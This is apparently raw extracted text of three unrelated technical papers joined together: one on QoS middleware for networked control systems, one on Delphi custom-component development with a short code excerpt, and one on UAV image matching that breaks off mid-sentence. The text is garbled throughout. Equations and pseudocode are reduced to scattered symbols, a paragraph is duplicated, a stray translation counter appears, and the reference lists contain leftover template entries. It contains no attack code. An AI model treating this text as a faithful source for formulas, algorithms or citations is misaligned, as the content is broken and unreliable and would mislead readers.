on dynamic programming algorithm for dynamic constraint, but it is difficult to clearly determine the application of customers' needs.S.S hakkottai et al. [8] in Ad Hoc wireless self-organizing network research, puts forward the idea of "cross layer design" in comprehensive considers the relationship of the protocol stack layers and retain the original layered protocol stack structure, on the basis of breaking the TCP/IP network hierarchy middle layer and the communication between the limit, supplement and designed a new type of network protocol stack, allowing interaction between the layers of communication protocol stacks. Xian university of electronic science and technology of yi-lin chang and others [9] in the cross layer design, on the basis of the five layers of typical network architecture was proposed and "cross-layer perception" concept, will be with the idea of cross-layer design, promotion to the network on the DE facto standard five levels.26/5000 Most current network protocol implementations provide only partial QoS functionality. Networked control systems is to run over in the basic network services, the simple network QoS mechanism can guarantee the QoS requirements, and the existing QoS guarantee strategy are based on "the best" service mechanism, and cannot provide components oriented middleware platform support. This chapter first analysis of networked control environment context factors, using the method of side oriented QoS based semantic model of real-time system, reconstruction of networked control system service quality in the hierarchical structure and establish the corresponding 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 109 management model, by extending the object management group interface definition language, will establish the QoS management model integrating into the kernel of the middleware services, and construct the field oriented control service QoS management framework, finally through the simulation experiments verify the QoS management mechanism of effectiveness. The structure of this paper is as follows: section 2 introduces the QoS semantic model and QoS service model for network-oriented control; Section 3 introduces QoS scheduling framework design; Section 4 introduces the QoS component access algorithm and QoS component deployment algorithm. Section 5 carries out the simulation experiment to verify the above strategy framework and the effectiveness of the algorithm. II. QOS SEMANTIC MODEL This section presents a QoS semantic model, its purpose is to establish an open, extensible to define, QoS data exchange and interoperation model, does not allow the presentation logic to QoS number as the QoS parameters, QoS management level, the change of QoS management mechanism and fundamental changes, decouple the presentation logic and processing logic, so as to better adapt to the various business requirements under the networked control systems. The semantic model is composed of QoS model and QoS management model. A. The metamodel QoS metamodel defines QoS said system required by the atomic data structure, it said in the QoS system plays a basic structural role, not only to enhance the QoS rigor of said system, and lay a foundation for the expansion of the QoS definition. The QoS model representation system is shown in figure 1 below. Figure 1. QoS meta model structure  Model Root Element is the Root Element of the inheritance hierarchy in the metamodel, which is the most basic abstract block.  Identifier is the string that the model element identifies itself, which is unique in the entire namespace.  category : abstract building blocks used to derive data types and class 2 objects. It is an aggregation of methods and properties.  DataType which defines the basic data types used to describe QoS, construct data types, template data types, and custom data types.  Class: an abstraction of the collection of objects of the same behavior, attributes, relationships, and semantics.  Schema: a framework consisting of one or more classes.  Qualifier is the specification and constraint of elements such as class, attribute and its outline.  Event can be located in time and space and can take place with practical significance.  Rule is a policy used to indicate a class's status migration when an event occurs. B. QoS management model The control application is a set of application artifacts with QoS characteristics. The component instance is the physical unit that is deployed to the instantiation in the component framework, and the runtime component instance can be represented as a process, thread, or other autonomous running unit in the component container environment. An application Configuration Graph, which is called a QoS component, is made up of abstract examples. Figure 2. QoS semantic component application configuration diagram From the component instance to the directed edge, where the output is input. The QoS feature of the component is shown as follows. In the above equation, the values of QoS attribute values are all real types, in which the QoS attribute list is represented and required by the component instance respectively. The other is the list of system resources occupied by the component instance runtime, which is provided by the system resource management service. III. QOS STRATEGY FRAMEWORK A. Frame structure This section is presented based on the strategy of QoS monitoring and the safeguard mechanism, it is running the QoS framework core components, not only for the resource service management and the operation of the communication network to provide performance guarantee, also the QoS parameters of dynamic monitoring in operation, to provide QoS strategy execution. Resources service according to the requirements of the performance of communication network, and these requirements is mapped to a communication network QoS standards, use appropriate protocol in Qualifier Attribute Classifier Method Schema Namespace Datatype Class Event ModeElement IdentifierRule * 1 * * 1 1* 1 1…* * 1 * 1 * 1 0...1 1 C 2C 1iC  2i C  i C j C n C ( , , ) Component demand provide QoS QoS Res QoS 1 2 [ , ,..., ], , 1,..., dem dem dem dem demand m i QoS q q q q double i m   1 2 [ , ,..., ], , 1,..., res res res res k i Res q q q q double i k   1 2 [ , ,..., ], , 1,..., pro pro pro pro provide n i QoS q q q q double i n   2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 110 communication network and QoS strategies for resource management to provide satisfactory service data transmission performance. The framework is shown in figure 3 below. Figure 3. QoS management framework B. QoS requirements mapping mechanism To be able to provide effective QoS support for control applications, you must be able to define clear QoS requirements from the user's expectations. Here, the concept of Group of Work (GoW) is presented, representing the minimum working granularity unit that can be processed by the resource service. An application can usually consist of several working groups, each of which can be processed by the resource service according to the corresponding QoS parameters. The process of extracting explicit QoS characteristics and requirements from the control application is shown in the figure below. Figure 4. QoS requirements mapping process The process of extracting the GoW from the application and classifying it by QoS is as follows: Where, represents a network control application, represents a GoW, and represents a QoS feature. When GoW classified according to the QoS characteristics, QoS requirements parameters, can be extracted from an application, the user can then according to the QoS parameters and other partners to negotiate, together to make an application to determine the level of QoS based on complete. The specific scheduling of resource services is performed in the middle tier, so the process can be seen as an implementation from the application layer business abstraction to the mid-tier QoS mapping. C. QoS component access algorithm The problem of component access can be described as: the function configuration diagram for the composite component request is mapped to the corresponding component instance; (2) according to the service QoS requests and system resource condition, choosing component instance specific QoS model, satisfied, and the equation between adjacent component instance can be set up, and all the component instance resources required to be met. In the following figure, an example of QoS component function configuration diagram and QoS diagram is given, and the process of the component instance access algorithm is given. 1 C 2 C 3 C 4 C 5 C 11QM 12QM 13QM 41QM 42QM 43QM 21QM 22QM 31QM 32QM 33QM 51QM 52QM Figure 5. The service component combination process Service composition for component steps, you will first need to choose for component instance QOS model satisfy the relationship is formed between adjacent component instance, unit construction planning according to the component function configuration diagram CG and QOS of component specifications constructing service QOS diagram QG. The specific algorithm flow is as follows: Algorithm 1: heuristic component access algorithm. Input: component function configuration diagram and system current available resource collection. Output: optional QoS component configuration set -- ConfigSet[] a) The Edge[N] array is placed in each Edge of the initialization function configuration diagram (CG). b) Find all source nodes and target nodes in Edge[N] and place them in the array of StartPt[] and EndPt[]; c) Foreach u in StartPt d) [ ]Visited U false ; e) Foreach W in EndPt f) [ ]Visited w false ; g) ConfigSet   ; h) Foreach u in StartPt 1 2 1 2 { , ,..., } { , ,... } { , ... } i i i i n e f j n NCSApp G G G Q Q Q Q Q Q   Control applications Network performance evaluation Build service evaluation The input interface The input interface Resource discovery QoS consultation and renegotiation QoS monitoring QoS extraction and mapping Output interface Reserved resources QoS distribution and redistribution QoS adaptive QoS resource usage measurement Resource management intelligence Bandwidth resources Control algorithm resources Controller resource Sensor resources Network QoS mechanism and strategy QoS monitoring QoS adaptive The application layer The middle layer Resource layer The network layer 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 111 i) tmp QC   ; j) If [ ]Visited U false k) then Call ( , ) tmp Construct u QC ; l) Procedure ( , )Construct u QC m) { n) [ ]Visited U true ; o) foreach [ ] i QM QoSProfile u { p) item QC   ; q) foreach t i q QM { r) if( All_Satisfied ==true ) { s) q_Satisfied = flase; t) foreach [ ] j QM QoSProfile v { u) if (Satisfied( t q )==true) v) _ _ { } j QC Item QC Item QM  ; w) q_Satisfied =true; x) } y) } z) } aa) if ( []u StartPt ){ bb) _QC QC QC Item  ;} cc) else if( u StartPt ){ dd) foreach Item QC { ee) if( i QM Item ) ff) _QC QC QC Item  ; gg) } hh) } ii) foreach []v EntPt { jj) ( , )Construct v QC ; kk) } ll) } Firstly, the function configuration diagram of the component is initialized, and the source and target nodes in the graph are placed into the corresponding data structure. Set the temporary edge set to empty; Then the heuristics generate configuration set function for each node of the source node; In this function, for each QoS configuration item, check whether the QoS attribute is satisfied in the instance of each component, and if it is satisfied, then check whether the component instance of the destination node satisfies the QoS configuration item; And the recursive method is used until each feasible QoS configuration item is output and the result is output. IV. SIMULATION EXPERIMENT In this section, the simulation experiment is used to verify the core algorithm of the QoS management framework and related hierarchical strategy design. Definition 1: QoS Requirements meeting Rate (QRMR: QoS Requirements Meet Rate), assuming that in all service application requests, the service application is successful, the QoS demand satisfaction Rate is defined as: The simulation experiment of this paper compares QRMR with different component selection algorithms, as shown in fig.6. The simulation experiment environment consists of four PCS networked with QoS component container. Figure 6. QoS simulation environment network structure QoS simulation experiment environment hypothesis, influencing QRMR factors for resource constraints and service resource requirements. Simulation experiment, repeatedly randomly from every seconds to create a composite service request, the simulated four composite service function configuration diagram of components and service components deployed as shown in figure 7, and after a 5-1 calculated feasible QOS configuration resource requirements as shown in table 1. Figure 7. The simulation experiment component function configuration diagram In the experiment, the QoS component only reserved management for the CPU resources, respectively representing the CPU resources. request request Success QRMR Total  1 P 2 P 3 P 4 P 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 112 TABLE 1. THE COMPOSITE SERVICE QOS CONFIGURATION OF RESOURCE REQUIREMENTS Service marks Feasible QoS configuration 11QM 10% 9% 13% 16% 12QM 16% 11% 10% 16% 13QM 9% 15% 6% 4% 21QM 12% 7% 12% 20% 22QM 15% 5% 15% 10% 31QM 7% 15% 4% 9% 32QM 20% 12% 20% 10% 33QM 16% 18% 12% 12% 41QM 10% 8% 8% 7% 42QM 10% 4% 5% 12% 43QM 7% 12% 10% 10% The QRMR of the statistical system is simulated every 1 second. The duration of each successful service is set in seconds, and when the service is completed, the resource will be recovered by the corresponding QoS component resource management yuan service.In the experiments 1r Capability , 2r Capability , 3r Capability and 4r Capability The size is set to100%.In the component access algorithm, 1 2 3 4, , ,r r r r The weights of resources are set respectively 1 0.5 r Q  , 2 0.4 r Q  , 3 0.35 r Q  , 4 0.45 r Q  . Figure 8. Different components access algorithm’s QRMR Therefore, simulation negotiation algorithm is obtained by using the exhaustive method of integer programming optimal solution. Figure 8 shows the QRMR changed over time. Can see from the result of the experiment at the beginning of the simulation of two kinds of algorithm can achieve higher success rate, but as the simulation process, the heuristic member access algorithm QRMR meet rate is around 0.3, more than the basic component selection algorithm. The results show that the heuristic adjust weight and through service resources through negotiation methods, QRMR can improve. Can see from the result of the experiment at the beginning of the simulation of two kinds of algorithm can achieve higher success rate, but as the simulation process, the heuristic member access algorithm QRMR meet rate is around 0.3, more than the basic component selection algorithm. The results show that QRMR can be improved by heuristic regulation of resource weight and through service resource negotiation. V. CONCLUSION First introduces the basic requirements for networked control systems of QoS, shows an open and scalable QoS semantic model, its constituent elements including contract for QoS parameters, QoS, QoS model, specification of QoS, QoS parameters, etc., makes the service components have the ability to adapted to network resources. Based on the analysis of QoS attribute of service component, the establishment process of component service is described, and a dynamic algorithm of component service group is proposed. At the same time, the design for the application layer, middle layer and resource layer and network layer QoS strategy, finally designs the dynamic service components based on resource distribution of container deployment simulation experiment, this section is verified the proposed QoS goal-driven dynamic deployment effectiveness of the algorithm. REFERENCES [1] Xu fei, liu mingyong, li wenbai, lei xiaokang. Study on the digital redesign of robust controllers for parametric uncertainty systems [J]. Systems engineering and electronic technology,2013,01:156-160. [2] I.T. Foster, C. Kesselman,C. Lee et aL A Distributed Resource ManagementArchitecture that Supports Advance Reservation and Co- Allocation[A]. In: Proceedings of the Seventh International Workshop on Quality of Service[C], London, UK, 1999: 27-36. [3] Poza-Lujan Jose-Luis, Posadas-Yagüe Juan-Luis.Distributed sensor architecture for intelligent control that supports quality of control and quality of service. Sensors (Switzerland),2015(15),3:4700-4733. [4] R. J. Al-Ali, K. Amin, G V. Laszewski et al. An OGSA-Based Quality of ServiceFramework [J]. Lecture Notes in Computer Science, 2004, 3033: 529-540. [5] Hakiri Akram,Berthou Pascal.Supporting SIP-based end-to-end Data Distribution Service QoS in WANs.Journal of Systems and Software,2014(95):100-121. [6] L. Z. Zeng, B. Benatallah,A. H. H. Ngu et al. QoS-Aware Middleware for Web Services Composition[J]. IEEE Transactions on Software Engineering, 2004, 30(5):311-327. [7] M. Wieczorek, S. Podlipnig, R. Prodan et aL Bi-criteria Scheduling of ScientificWorkflows for the Gird [A]. In: Proceedings of the 8Th International Symposium onCluster Computing and the Grid (CCGrid 2008) [C], Lyon, France: IEEE ComputerSociety, 2008: 9-16. [8] Shakkottai S, Rappaport T, Karlsson P. Cross-layer design for wireless networks. IEEE Communications Magazine, 2003, 41(10): 74-80. [9] A study on the movement and distribution of nodes with multiple entry and exit regions. Computer research and development, 2008, 45(3): 428-435. 1 S 2 S 1 r 2r 3r 4r 3 S 4 S work_g5eo6uu34jandfw6go6vd7ezse ---- Paper Title (use style: paper title) 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 58 Research on Method of Rapid Software Development Based on Component Design Hu Jingyi School of Computer Science and Engineering Xi’an Technological University Xi'an, 710032, China e-mail: 1005607919@qq.com Lei Juchao School of Computer Science and Engineering Xi’an Technological University Xi'an, 710032, China Wang Yaming School of Computer Science and Engineering Xi’an Technological University Xi'an, 710032, China e-mail: 616419803@qq.com Zhao Yalin School of Computer Science and Engineering Xi’an Technological University Xi'an, 710032, China e-mail: zhaoyalin6987@qq.com Abstract—This This article presents a quick way to develop your system with custom components in Delphi. Use the above method can minimize code duplication, improve work efficiency. In this paper, we apply this method to the development of information management system in a university based on the Data Snap three-tier architecture. Through practice, we find that the workload of the original three months, and we only need 20 days to complete. Therefore, adopting the rapid software development method based on component design proposed in this paper can not only shorten the programming time of management systems such as ERP and information management by more than two thirds, but also bring great advantages in system development. Keywords-Delphi; Custom Components; ERP; Efficiency; Time I. INTRODUCTION With the advent of the information age, we are more and more inseparable from technology. Now developed a lot of PC software such as information management systems that can help people save a lot of manpower, material resources. Especially every year at the end of annual work statistics, the design of a set of software through the relevant settings for automatic statistical calculation, approval, access and other functions is necessary. The completion of the software can be fully realized at any time computer statistics automatically calculate the workload of a variety of teaching and research, but also can effectively avoid errors in the calculation process. There are a lot of software that uses a lot of languages to develop the PC end now, but to the visual software development, this text uses Delphi to finish. And Delphi is a powerful, Windows-based environment, object-oriented visual application development tool. It combines the power of the traditional programming language Object Pascal with the database language for both traditional arithmetic programming and database programming. The Data Snap technology system in Delphi provides a mechanism for transferring database information between the client and the application server. Meanwhile, the rich component library brings great convenience to the program design. Delphi has become one of the most popular visual software development tools today. When we used Delphi to develop PC software, we developed a way to customize the components to complete the software development and make the program completed in three months and we only need 20 days to complete. II. THEORETICAL BASIS A. Practicality of Custom Components In a system development, design a custom component. In the process of system development can be based on the analysis of needs sorted out the same part of the logic function, the use of custom components to complete the corresponding function. Therefore, anytime, anywhere custom components into different needs of the interface according to the corresponding function, reduce code duplication and greatly facilitate the development of programming speed. In an ERP system to do needs analysis, we will find a lot of repetitive logic requirements, For example: doing computer college information management system, whether it is to deal with college business or teachers related to the operation, there are for the basic data to add, modify, delete and so on. That by designing custom components: Add button to complete the corresponding function, into the page you need to complete its specific functions and greatly reduce the programmer's efficiency. B. Inheritance of Custom Components DElphi component is an object library, but also a class. The base class for all objects in Delphi is TObject, and the most primitive base class for a component is TObject, as shown in Figure 1. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 59 Tobject Exception TInterfacedOBject TStream TPersistent TComObject TgraphicObjtce TGraphic TComponent TCollection TStrings TApplication TDataSet TMenu TControl TCommonDialog TField Figure 1. Example of a ONE-COLUMN figure caption. The hierarchy of components in this structure is: TObject ----> TPersistent -----> TComponent -----> TControl. TComponent, the base class for all Delphi components, inherits from this class for all object libraries that you want to register directly with the IDE for visualization. TComponent provides the necessary information to make the component work on Delphi's IDE. Then TComponent derives the TControl class, which is the base class for all flagship visual controls. All of our components are based on TComponent. III. EXPERIMENT AND TEST A. The Basis for Custom Component Development In the development of custom components we need to analyze a page needs and then do some work:  Data acquistion: In general, we are all custom components that design functionality, and we need to get the data or output the data. In each page there will be a lot of data-type components, how do we find the corresponding data components, you can design components by the naming rules to find the corresponding data-type components. For example: Set the settings in the component, to the components of a unified naming rules such as: cktext1_XXXX,XXXX for the database table field names, according to cktext1 can find the components needed, according to the XXXX components and database fields correspond.  Data transfer: Passing data using JSON. JSON is a lightweight data exchange format based on a subset of ECMAScript that stores and represents data in a completely independent of the programming language. There are only two structures in JSON: Objects and Arrays JSON values consist of numbers, strings, logical values, arrays, objects, null, and so on. Using JSON as a data exchange format between the client and the server, the JSON data format can be used directly by the server, greatly simplifying the code development of the client and server, and easier to maintain. And the data format is relatively simple, easy to read and write, the format is compressed, occupy a small bandwidth.  Mutual exclusion between functional components: When the button On Click is executed, in order to avoid data confusion, you must make the button is not related to the button is invalid. For example, when you click the Add button in the information management system, the buttons, such as modify, delete, archive, data export, return, etc., must be inactive. The Save and Cancel buttons must be valid. 2 When the save or cancel button is clicked, buttons such as add, edit, archive and return should be valid, while save and cancel buttons should be inactive. Therefore, the entire information management system interface point of view, in addition to archiving, data printing, return no mutual exclusion, the other buttons need to be mutually exclusive with other buttons. B. Associations Between Components in the Page There are many custom components in a page, but we need to know the current step to the program flow, the current table, the current operator, the current name from the table, and others. Then we need to design a custom template components on each page, template components design attributes as shown in Table 1: TABLE I. TEMPLATE ATTRIBUTES Template attributes Explanation Template attributes Explanation mb_lcmc Process name mb_prior_step Step number mb_now_step The current step number mb_next_step Next step number mb_tablename The current table name mb_prior_tablena me Pre-step name mb_lb_field Category field mb_lb_name Category name mb_cb_tablena me From the table name mb_next_tablenam e Next table name 1 mb_next_table nameb Next table name 2 mb_next_lczttable name Next process status table name mb_next_lbna me Next category mb_next_lbfield Next category field mb_yzd Data upload original field mb_mbzd Data download target field mb_czr Operator mb_cjyh root Name Template name tag Mark field mb_lc_yesno Is it a process? Others as spare fields C. Implementation of custom component development After the preparation of the above two parts, the process of custom components in Delphi contains the following steps:  Create a library unit that contains new parts.  Member has inherited a new type of component type.  Add properties, methods and events.  Register parts with Delphi.  Create Help files for the component's properties methods and events. Custom components such as adding components The main code is as follows: Uses System. SysUtils, System. Classes, Vcl. Controls, Vcl. StdCtrls, Vcl. Buttons, Vcl. ComCtrls , DBGridEh, Math, Datasnap. DBClient, mysave, IniBoxes, mygd2wgd, MyIniDB ComboBox, MB, MyIni 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 60 ComboBox, Vcl. Graphics ;// The required unit file for creating the component. RegisterComponents('d102', [Tmyadd]); constructor Tmyadd.Create(AOwner:TComponent); inherited; self.OnClick:=myadd; nowday:=FormatDateTime('yyyyMMddhhnnss',Now()); czsj:=nowday; ss1:=inttostr(i); lcbh:=czsj+ss1; (self.Owner.FindComponent('MB1') as TMB).mb_lcbh:=lcbh; lcmc:=(self.Owner.FindComponent('MB1') as TMB).mb_lcmc; czr:=(self.Owner.FindComponent('MB1') as TMB).mb_czr; //Obtain name and operator letter via template component k:= Owner.ComponentCount; //Get the number of components on the form for j := 0 to k - 1 do Begin namey:=Owner.Components[j].ClassName; if(namey='Tmyedit')then(self.Owner.Components[j] as TBitBtn).Enabled:=False//Button exclusive event else if(namey='Tmysave')thenif(namey='Tmysave')then begin (self.Owner.Components[j] as TBitBtn).Enabled:=True ; (self.Owner.Components[j] as Tmysave).isadd:=True; End //Other mutually exclusive operation (self.Owner.FindComponent('maindbgrid') as TDBGridEh).Enabled:=False; main_dataset:= (self.Owner.FindComponent('main_set') as TClientDataSet); main_dataset.Append;//Find the form on the main interface with the data after the Query, and add records main_dataset.FindField('lcbh').AsString:=lcbh; //New process ID main_dataset.FindField('czr').AsString:=czr; main_dataset.FindField('czsj').AsString:=czsj; main_dataset.FindField('lcjdmc').AsString:=lcjdmc; IV. TEST This experiment is in the computer system of information management system for experiments, the test results are as follows: Custom Component Testing: A custom component of this article appears in the Delphi Visualization Toolbox: Figure 2 Figure 2. Custom component renderings  In the page, drag the custom components to complete the corresponding function: Figure 3 Figure 3. System in a page renderings V. CONCLUSION According to the method of using custom component design in software development, the following advantages and limitations are obtained:  Using the custom component technology, the management system model was initially realized, the idea of software reuse was realized, the phenomenon of repeated encoding was reduced, and the software development efficiency, maintainability and scalability were improved.  The use of custom components in the information management system and the related operation of each page through the related parameter settings are feasible and safe.  for the development of a set of software, through the development of custom components greatly reduce the development cycle, a great use of value to the actual development of software. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 61  This method of custom components in the development of software generally for the role of ERT system, for some web version of the software is not very effective. ACKNOWLEDGMENT Thanks to teacher Lei hard guidance, thanks to brothers and sisters, brothers and boys to provide help. Thanks for the correction of the expert group, to thank all those who helped me. REFERENCES [1] Yang Changchun [ed]. Delphi Programming Guide Third Edition [M]. Tsinghua University Press, 2016.J. Clerk Maxwell, A Treatise on Electricity and Magnetism, 3rd ed., vol. 2. Oxford: Clarendon, 1892, pp.68–73. [2] Gao Zhiming. Depth discussion of Delphi three-tier architecture [J]. Programmer. 2004 (09)K. Elissa, “Title of paper if known,” unpublished. [3] Chen Dongsheng. System Analysis of Multi-tier Application Based on DataSnap Technology [J]. Computer Knowledge and Technology. 2013 (35). [4] He Dinghua. Three-tier client-server database application Delphi implementation [J]. Information Technology and Information Technology .2005 (02). [5] YIN Kaicheng, WAN Xiaodong. Application of Three-tier Distributed Structure Database Based on Delphi [J]. Tangshan University ,.2003 (04). [6] Miaofei Hua, Zhou Qiaoshu. SQL Server 2008 database management system advantages [J]. Journal of Changchun Normal University, 2014 (06): 76-77 + 81. [7] Li Wensheng. Implementing Three-tier Client / Server Database Application Program in Delphi [J] .Computer Engineering.2000 (07). [8] WU Xiaolin, JIANG Xian-gang, GAO Yanjin. Research on Connection Technology of Multi-tier Database Application System Based on Delphi [J] .Jia Dong Jiao Tong Da Xue Bao .2005 (01). work_gcjn4upkcbdybjfasoc2wb67b4 ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 1 Research and Realization on the key technology of Motion Image Matching Based on UAV Yuri Shebzukhov Department of the International Relations Belarusian State University of Transport, Republic of Belarus 34, Kirova street, Gomel, 246653, Republic of Belarus e-mail: oms@bsut.by Wang Yubian* Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street, Gomel, 246653, Republic of Belarus e-mail: alika_wang@mail.ru Abstract—With the development of communication network and computer software and hardware technology, especially the emergence of high-precision and high-resolution image sensors, the photography and measurement technology of aerial image have played an increasingly important role in today's geological survey. The traditional aeronautical measurement is carried out by a large manned aircraft. The collected measurement information has a large capacity and a wide shooting range, which is suitable for large-area operations. This type of measurement requires high hardware requirements and is expensive, and it is not suitable for small areas. UAV aerial measurement system is used to measure the small areas, UAV is in small size, with great flight fluctuation, but the data image collected is not accurate enough. In this paper, the common algorithms of image fast matching are compared to conduct in-depth research on gray-level matching and feature-based matching, and SIFT feature matching algorithm based on feature matching is proposed to obtain the measurement image as consistent as possible with the actual scene. The main features of the object to be measured can be obtained through the actual surface area image measurement test, which is of practical significance in the practical low-altitude small area surveying and mapping. Keywords-UAV; Moving Image; Feature Detection; Image Matching; Image Pre-Processing I. INTRODUCTION UAV is named quad-rotor aircraft or quad-rotor UAV [1], It is a four-propeller sky aircraft with cross-shaped propellers. The UAV can be used to take aerial photos or record video with an optical camera or miniature video recorder. UAV photography measurement system is established on the basis of unmanned aerial vehicle (UAV) mobile platform, it is a kind of advanced measurement technology to achieve high spatial resolution remote sensing image data, it is playing the very major role in the geological landform measurement, disaster reduction, disaster prevention, emergency rescue, emergency treatment, post-disaster reconstruction and so on. At present, in the aspect of UAV it mainly relies on the image aerial camera to collect the image inland and aboard. The traditional measurement camera is not only expensive, but also needs to carry out film image scanning to obtain the digital image. Its shooting quality is low and the measurement takes a long time. With the development of the UAV aerial survey technology, storage and transmission technology, using the measurement type camera CCD image acquisition has been widely used, the CCD camera has the advantages of a low price, sensors work stability, high sensitivity, the camera CCD cannot direct measurement, the difference of image distortion correction is bigger, so before shot aircraft must be matching the calibration. DOI: 10.21307/ijanmc-2019-014 javascript:; javascript:; International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 2 II. PREPROCESSING OF UAV IMAGE As the UAV photography system is equipped with a non-professional measuring digital camera, the performance of the instrument is unstable and the orientation element is uncertain, so bring out the optical distortion error of aerial image. The camera focal length used in this system is fixed, so the distortion difference is the systematic error, which produces the same image for all the collected images. The inspection of camera can adopt the methods of optical laboratory inspection, laboratory inspection and on-duty inspection. At present, the main test method is laboratory test. The experimental field is composed of some mark points of known space coordinates. In the process of check and correct, the experimental field is photographed by the camera under check, and the internal azimuth elements and other elements affecting the shape of the beam are solved according to the method of single space resection or multi-space resection [2]. In 2D experimental campus, the system uses UAV digital camera Easy Calibrate to check and correct the digital camera SonyRx100), Table 1 shows the detection results and contents, with the origin of coordinates at the lower left corner of the image. TABLE I. THE CALIBRATION RESULTS OF SONY RX100 CAMERA Content of Check Calibration Value Remark x0 -0.008214mm the element of camera internal azimuth y0 -0.003216mm f(focal distance) 10.41234 k1 (Radial distortion factor) 2.12E-10 the coefficient of radial distortion k2(the factor of radial distortion) -8.14E-18 p1 (the factor of eccentricity distortion) 3.14E-7 Tangential distortion coefficient p2 (the factor of eccentricity distortion) -1.42E-7 Image distortion correction -- indirect method. This method USES the coordinates on the corrected image to calculate the image coordinates of the corresponding points on the original image, and combines the gray interpolation method to realize image correction [3], As shown in figure 1. Figure 1. Image distortion correction schematic diagram javascript:; javascript:; javascript:; javascript:; International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 3 After years of research, the calculate the deformation correction models getting thrown the error correction model), The model of error correction is:   ： Image point coordinates x_0 and y_0 with image center as the origin: main point coordinates picture.  ：coefficient of radial distortion ：coefficient of tangential distortion ：Non-square scaling factor of pixels ：The no orthogonal error coefficient of CCD array arrangement. The space resection method is used to calculate the coordinates of the camera in photography, which improves the precision of high external square elements and the precision of geometric calibration [4]. The precise control of UAV attitude is mainly timely adjusted through the acquired signals of the attitude sensor, which generally includes two types: the angle sensor and the angular velocity sensor，The dip sensor is implemented indirectly by an acceleration sensor from three directions, The output signal values represent the current three axial acceleration values, If the UAV hovers in the air and stays still when the actual geological aerial measurement is made, then obtained acceleration value can be easily converted to obtain the real dip parameter [5]. It is impossible for a drone to remain stationary in the air for a long time in practical applications, When there is wind, the UAV may deviate from a certain direction when it is disturbed. Even if the UAV remains in a horizontal direction, the output value of the acceleration sensor will still deviate from the central value, resulting in the misjudgment value given by the control center. To avoid this kind of situation, often need to introduce three axis in the practical measuring angular velocity sensor and ultrasonic range finder, according to the three axis get up the acceleration and angular velocity and the Z axis direction real-time highly value the rate of change of the acceleration of X, Y axis direction, so as to draw close to actual information of the real Angle [5]. III. UAV IMAGE MATCHING In most cases, the UAV image mapping method adopts the image matching technology, which recognizes the eponymous point between two images or multiple images through corresponding matching algorithm. The common matching methods mainly include the following two categories: one is based on grayscale matching, the other is based on feature matching [4]. In the actual measurement in this paper, SIFT feature matching algorithm, which is most commonly used in feature matching mode, is adopted for high-precision matching of massive data. SIFT matching algorithm adopts the matching based on local feature values of the image [6]. This algorithm holds invariance for translation, rotation occlusion, etc. Therefore, it has strong stability in actual use. The feature matching process is shown in figure 2. Figure 2. Feature matching flow chart International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 4 A. Pyramid image Pyramid image refers to the process of decomposing the original image to obtain a series of sub-images with different resolutions. These images are sorted from small to large according to the resolution, forming a group of overlapping pyramid-like images. The matching point is found in the top image, and the matching position is taken as the predicted position of the next layer. The matching result of this layer is taken as the initial matching position of the next layer, and then the matching is conducted successively. The matching result is used as control to match other feature points [7]. This process from top to bottom, from coarse to fine, ensures the reliability of image search process. In the pyramid image structure, the image is represented by hierarchical structure. At the top of the pyramid structure, data is stored at the lowest resolution possible, As the number of pyramid layers increases, The resolution of the data decreases successively. at the bottom of the pyramid, the data with the highest resolution can be stored to meet the needs of users [8]. In this way, different layers and different resolutions are adopted to store and display according to the needs of users, forming a pyramid structure with a higher resolution to a lower one and a smaller data volume to a larger one. This image pyramid structure is a typical hierarchical data structure used for image coding and progressive image transmission [9]. It is suitable for multi-resolution organization of raster data and image data and is also a lossy compression square of raster data or image data. B. Image feature point extraction Feature extraction refers to using a computer to present the image information of the same name in the image, which determines the common features in the image [7]. Image feature extraction generally depends on the distribution of gray in the image, and the position shape and size of features are determined through the information. SIFT feature matching algorithm consists of two parts [10]. The vector features are extracted from multiple images；SIFT is used to match feature vectors. Scale space representation is an expression based on region. Scale space is defined as the product of Gaussian convolution kernel and remote sensing image. Through the derivation of Koendetink and Babaud, it is proved that Gaussian kernel is the only linear kernel to realize scale transformation）[8]。  In formula 4, L(x, y, σ) is the scale space, is the Gaussian convolution kernel ， is the remote sensing image， x, y, σ are respectively represented by position parameters and scale parameters. The smaller the scale space factor is, the smaller the scale is.  After defining the scale space, the scale space function can be used to build the Gaussian pyramid model, The scale proportion between two adjacent layers and the same rank pyramid affect the scale space function defined between two adjacent layers [11]. The scale between adjacent layers is defined as k, Define the scale factor as σ), is the differential Gaussian pyramid function. At last, each sample point is compared with the adjacent points in the corresponding positions of the upper and lower scale space around the same scale space. If the detection point is local maximum or minimum, it is a candidate point of the image in this scale [12]. IV. THE EXPERIMENTAL TEST This experiment adopts the UAV model for the average Inspire V2.0 aerial vehicle four axis, the main parameters International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 5 including the maximum altitude of 4500 meters, maximum rising speed of 5 m/s, the maximum level flight speed of 22 m/s, maximum pitching Angle 35 ° 10 m/s wind power, aircraft cabin image sensor using Sony EXMOR 1/2.3)。The image device used in this experiment is Cannon5D Mark II, The image size is 36*24mm. Install Visual Studio 2017 on your laptop and configure Open CV for experimental testing, Using C++ to achieve SIFT image feature point extraction, The matching method is two dimensional feature point Brute Force Matcher, Set a certain threshold to filter the matching results, Using Find Homography function to set RANSAC method to eliminate error matching, SIFT was tested according to the above steps to understand its performance, and the performance was obtained as shown in table 2. TABLE II. FEATURES MATCHING PERFORMANCE TABLE SIFT+BFMatch Image extraction point 33092/30012 Time to generate the descriptor 178340ms Match the time 278731ms Threshold extraction points 16782 Filter after mismatched points 9783 The experimental results show that the method has a reasonable matching time. After filtering the threshold value and the basic matrix, the points basically cover the key area of the image. The pixel distribution is uniform with the low error. The system can meet the matching requirements, and the matching test image is shown in figure 3. The accuracy rate of the experimental matching is 91.63%. If the image is improved with light effect, the accuracy can reach 93.25%. Therefore, 